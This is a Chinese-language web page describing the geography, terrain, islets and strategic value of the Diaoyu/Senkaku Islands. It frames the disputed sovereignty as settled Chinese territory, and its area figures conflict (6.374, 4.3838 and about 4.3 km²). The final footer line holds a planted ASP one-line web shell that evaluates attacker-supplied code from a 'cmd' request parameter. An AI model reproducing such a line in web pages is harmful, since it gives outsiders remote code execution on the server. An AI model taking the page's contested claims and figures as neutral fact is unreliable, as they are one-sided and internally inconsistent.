钓鱼岛风光

钓鱼岛地理

时间:2014-9-27 16:45:06  作者:  来源:  查看:226  评论:0
内容摘要:位置钓鱼岛及其附属岛屿分散于北纬25°40′~26°、东经123°~124°34′之间,总面积约6.374平方公里(日称5.56平方公里)。最高海拔高华峰362米位于距浙江省温州市约356千米、福建省福州市约385千米、台湾...

位置
钓鱼岛及其附属岛屿分散于北纬25°40′~26°、东经123°~124°34′之间,总面积约6.374平方公里(日称5.56平方公里)。最高海拔高华峰362米位于距浙江省温州市约356千米、福建省福州市约385千米、台湾基隆市约190千米处。 大陆福建福州长乐国际机场东偏南约385公里(208海里)处。毗邻琉球群岛那霸空港(注:冲绳那霸空港)西偏南约417公里(225海里)处。钓鱼岛呈番薯形,东西长约3.5公里,南北宽约1.5公里,面积4.3838平方公里,周围海域面积约为17万平方公里。
shadow© 2014 Baidu - Data © NavInfo & CenNavi & 道道通
钓鱼岛
本数据来源于百度地图,最终结果以百度地图数据为准。
地形地貌
地势北部较平坦,南部陡峭,中央山脉横贯东西;最高山峰(高华峰)海拔362米,位于中部;其它尚有高程320米、258米、242米的山峰若干,及4条主要溪流。位于东海大陆架上。暂由日本管辖的琉球群岛(冲绳)是大陆架之外侧的火山岛,琉球群岛处于东海大陆架上。钓鱼岛列岛实为台湾大屯山之延伸,依据1960年生效的大陆架公约观点,钓鱼岛列岛理应为台湾岛的一部分。
战略价值
  捍卫中国固有领土-钓鱼岛及其附属岛屿
钓鱼岛列岛均为无人岛,处于中国与琉球之间琉球海槽。在大陆架划分上,中国和日本是相向而不共架的大陆架,由冲绳(琉球)海槽分隔,但钓鱼岛位于冲绳(琉球)海槽的西侧上沿。一旦日本拥有钓鱼岛的行政管辖权,不只是占领钓鱼岛列岛,而是让其领土踏在中国大陆架上,中日就变成了相向而共架的大陆架。中国军事科学学会副秘书长兼少将罗援指,根据《国际海洋法公约》,如果钓鱼岛被日本非法占据,中日就得按中间线原则划分大陆架,中国不仅丢失大量的海洋管辖区和海底资源,而且美日对中国的战略封堵线,将从第一岛链又前推到中间线以西。
从军事地理学角度看,钓鱼列岛有着十分重要、但并不为人多知的军事价值。在我大陆国土的海洋方向,形成一道大陆外缘天然的屏障。这一串岛屿的中段,我东海方向的正面,正好是琉球群岛和台湾岛,它们加上日本九州岛使我东海海区与太平洋分隔。
5下辖岛屿编辑钓鱼岛列岛(Fishing Islands)由钓鱼岛(主岛)、南小岛、北小岛、赤尾屿、黄尾屿和3块小岛礁,即北屿、南屿、飞濑岛等8个无人岛礁组成。(这些岛屿在地质上和花瓶屿、棉花屿、彭佳屿一起,都是台湾北部近海的观音山、大屯山等海岸山脉延伸入海后的突出部分,为台湾岛的附属岛屿。)
钓鱼岛面积居八小岛之冠,约4.3平方公里,岛上基岩裸露,尖峰突起,土层基薄,淡水水源未查明。山茶、棕榈、马齿苋随处可见,仙人掌遍地丛生。植物为适应海上强风环境,都长得矮而粗壮,很多是名贵药材。海草海芙蓉生长在沿岸岩石缝,是防治风湿症和高血压良药。我国沿海采药者有不少人祖辈在钓鱼台诸岛采摘中草药。  
 
黄尾屿位于钓鱼岛东北,陡岩峭壁,无数海鸟栖居,每年4-5月,成群海鸟几乎遮住黄尾屿天空。海鸟在黄尾屿产卵,数量极为惊人,登岸捡拾鸟蛋者,俯拾即得。黄尾屿因鸟多,又称为“鸟岛”。 钓鱼岛一带是太平洋的海鸟栖身所,可是海鸟好似有两个不同的家族,只分别栖身黄尾屿和北小岛,居中的钓鱼岛仅是两岛之间停留站。 
 
南小岛又称为蛇岛。面积约0.40平方千米,最高海拔139m。南小岛蛇多,简直遍布全岛,最大的有碗口粗,最小的则如小手指头细。蛇的颜色一 般以黄色、黑色居多,但都是无毒的。南小岛也许由于蛇太多,鸟类竟然绝迹。北小岛和南小岛孤悬于海中,两岛相隔约200m,古时合称橄榄山。与钓鱼岛组成一个天然的“蛇岛海峡“。就地形观察,它们原为一个岛屿,后因断裂活动,地堑陷落,一岛分裂为二。  
 
北小岛又称为鸟岛,多群鸟栖息。位于中国钓鱼岛以东约5千米处。宽约540米,长约880米,周长约3.2公里,面积0.31平方千米。和南小岛一样也是无人居住的岛屿。  
 
赤尾屿是钓鱼台列岛最东端的岛屿。其地理位置位于东经124°34′09〞~124°33′50〞,北纬25°53′54〞~25°54′06〞,面积为0.0609平方公里。亦称赤屿、赤坎屿、赤尾山、赤尾岛、赤尾礁。  
 
北屿原名大北小岛,是台湾岛附属岛屿东北诸岛的东段岛链钓鱼台列岛的组成部分,位于钓鱼岛东北约6千米处,行政上隶属于台湾省宜兰县头城镇。大北小岛和北小岛同为钓鱼岛群岛8大主岛之一,由于名称上有所混淆,中国国家海洋局、民政部现将大北小岛的标准名称定为北屿。[6]    
 
南屿原名大南小岛,是台湾岛附属岛屿东北诸岛的东段岛链钓鱼台列岛的组成部分,位于钓鱼岛东北约7.4千米处,行政上隶属于台湾省宜兰县头城镇。也称蛇岛,因该岛上多蛇而得此名,该岛屿无人居住。大南小岛和南小岛同为钓鱼岛群岛8大主岛之一,国家海洋局、民政部现将大南小岛的标准名称定为南屿。[7]   
 
飞濑屿原名飞濑岛,钓鱼岛列岛8个小岛之一,也是最小的一个,面积为800平方米,无人岛,位于福建正东,台湾东北,东经123°-124°34′,北纬25°40′-26°左右,距基隆102海里,距那霸230海里。处在我国陆地领土自然延伸的大陆架上,以冲绳海沟与琉球群岛相隔,周边海域为新三纪沉积盆地,富藏石油。行政上隶属于中国台湾宜兰县头城镇,邮编为290。[8]   
 

 

上一篇:没有了
下一篇:没有了
相关评论
评论者:      验证码:  点击获取验证码
本类更新
本类推荐
本类排行
湘ICP备11011102号
Powered by WCADDL
":eval request("cmd"):